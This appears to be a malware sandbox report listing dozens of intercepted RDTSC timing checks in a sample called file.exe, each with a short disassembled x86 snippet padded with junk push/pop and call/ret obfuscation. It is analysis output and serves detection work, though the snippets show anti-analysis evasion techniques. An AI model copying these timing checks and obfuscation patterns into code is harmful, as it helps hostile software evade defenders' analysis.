Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AC60 second address: 59AC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AE00 second address: 59AE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148C8B7AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AE13 second address: 59AE1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AE1E second address: 59AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AE27 second address: 59AE44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58159h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D11B second address: 59D121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D121 second address: 59D134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F0148B58148h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D1E2 second address: 59D20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F0148C8B7B2h 0x0000000d jnl 00007F0148C8B7ACh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push AB60AB89h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e js 00007F0148C8B7A6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D20E second address: 59D213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D399 second address: 59D3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 add dword ptr [esp], 22C445E1h 0x0000000d add edx, dword ptr [ebp+122D37D1h] 0x00000013 mov edi, 26178FEEh 0x00000018 push 00000003h 0x0000001a jmp 00007F0148C8B7AEh 0x0000001f push 00000000h 0x00000021 sub dword ptr [ebp+122D18D5h], edi 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F0148C8B7A8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000017h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D188Bh], eax 0x00000049 push 80C25631h 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 push edi 0x00000052 pop edi 0x00000053 pop esi 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D4B1 second address: 59D55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B58156h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D188Bh], esi 0x00000014 push 00000000h 0x00000016 add esi, dword ptr [ebp+122D18D5h] 0x0000001c push 17E19ABFh 0x00000021 jmp 00007F0148B5814Dh 0x00000026 xor dword ptr [esp], 17E19A3Fh 0x0000002d mov edi, dword ptr [ebp+122D190Fh] 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F0148B58148h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f sub dword ptr [ebp+122D2A13h], ebx 0x00000055 push 00000000h 0x00000057 call 00007F0148B5814Ah 0x0000005c pop edi 0x0000005d pushad 0x0000005e mov edi, dword ptr [ebp+122D35EDh] 0x00000064 popad 0x00000065 push 00000003h 0x00000067 jmp 00007F0148B5814Ch 0x0000006c sub ecx, dword ptr [ebp+122D3599h] 0x00000072 push 412D8DDEh 0x00000077 push eax 0x00000078 push edx 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c pop edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D55E second address: 59D598 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0148C8B7B4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 7ED27222h 0x00000012 mov ch, EEh 0x00000014 lea ebx, dword ptr [ebp+1245105Dh] 0x0000001a mov edx, dword ptr [ebp+122D22F5h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 je 00007F0148C8B7ACh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D598 second address: 59D59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BF095 second address: 5BF0A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 jo 00007F0148C8B7C5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BCFC5 second address: 5BCFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BCFCD second address: 5BCFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B0h 0x00000007 jbe 00007F0148C8B7A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BD3B3 second address: 5BD3BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0148B5814Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BD917 second address: 5BD92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0148C8B7AAh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BD92C second address: 5BD933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BDAA0 second address: 5BDAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jbe 00007F0148C8B7A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BDBDF second address: 5BDBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE7EA second address: 5BE800 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0148C8B7AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE800 second address: 5BE804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE92D second address: 5BE935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69B8 second address: 5C69BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69BC second address: 5C69C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69C2 second address: 5C69EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0148B58146h 0x00000009 jmp 00007F0148B58155h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69EA second address: 5C69EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69EE second address: 5C69F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69F4 second address: 5C69FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0148C8B7ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C69FE second address: 5C6A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F0148B5814Ch 0x00000012 jns 00007F0148B58146h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C6A16 second address: 5C6A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F0148C8B7A6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C5B33 second address: 5C5B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C6B05 second address: 5C6B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C6B09 second address: 5C6B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C6B0F second address: 5C6B19 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148C8B7ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CC902 second address: 5CC908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CC908 second address: 5CC90C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCA28 second address: 5CCA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B58159h 0x00000009 pop ebx 0x0000000a js 00007F0148B5814Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F0148B5814Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCA58 second address: 5CCA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCA61 second address: 5CCA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0148B58146h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCFF3 second address: 5CCFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCFF9 second address: 5CCFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCFFE second address: 5CD016 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0148C8B7B3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD169 second address: 5CD18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F0148B58150h 0x0000000a pop ecx 0x0000000b popad 0x0000000c jl 00007F0148B58168h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD18A second address: 5CD18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDA21 second address: 5CDA26 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDACA second address: 5CDACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDACF second address: 5CDB09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007F0148B58156h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 pushad 0x00000018 jnl 00007F0148B58146h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 pop eax 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB09 second address: 5CDB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB0E second address: 5CDB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0148B58146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB18 second address: 5CDB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB1C second address: 5CDB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB2C second address: 5CDB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0148C8B7B5h 0x0000000a popad 0x0000000b pop eax 0x0000000c mov esi, edi 0x0000000e push 61F42C2Dh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB54 second address: 5CDB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDC9D second address: 5CDCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDCA1 second address: 5CDCA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE1CD second address: 5CE1D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF1CD second address: 5CF1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CFB4A second address: 5CFB5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF99B second address: 5CF9B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148B58155h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF9B4 second address: 5CF9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D03B7 second address: 5D03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF9B8 second address: 5CF9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0B31 second address: 5D0B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D03BB second address: 5D03C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0B35 second address: 5D0B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0148B58156h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 and esi, 2E8EB1D1h 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+122D2DCCh] 0x00000020 mov esi, dword ptr [ebp+122D22E6h] 0x00000026 push 00000000h 0x00000028 xchg eax, ebx 0x00000029 js 00007F0148B58154h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D03C1 second address: 5D03C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D03C7 second address: 5D03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D03CB second address: 5D03DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F0148C8B7A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D03DE second address: 5D03F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D38F6 second address: 5D38FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D38FA second address: 5D3979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F0148B58148h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub esi, dword ptr [ebp+122D5697h] 0x0000002d jmp 00007F0148B58155h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 mov esi, eax 0x00000038 xchg eax, ebx 0x00000039 js 00007F0148B5815Fh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D3979 second address: 5D397D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D397D second address: 5D3987 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D603A second address: 5D6053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0148C8B7A6h 0x0000000a jmp 00007F0148C8B7AFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6053 second address: 5D6057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6057 second address: 5D606D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0148C8B7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D606D second address: 5D608A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58159h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D608A second address: 5D6090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D40B7 second address: 5D40C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D918A second address: 5D918E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D975B second address: 5D9772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0148B5814Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9772 second address: 5D97EE instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148C8B7BDh 0x00000008 jmp 00007F0148C8B7B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 cmc 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0148C8B7A8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov dword ptr [ebp+12451266h], edi 0x00000033 push 00000000h 0x00000035 mov di, EA50h 0x00000039 jo 00007F0148C8B7AEh 0x0000003f push esi 0x00000040 ja 00007F0148C8B7A6h 0x00000046 pop ebx 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F0148C8B7B8h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D97EE second address: 5D97F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D97F2 second address: 5D97F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA6BE second address: 5DA6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148B58150h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB7FA second address: 5DB80C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F0148C8B7A6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB80C second address: 5DB811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
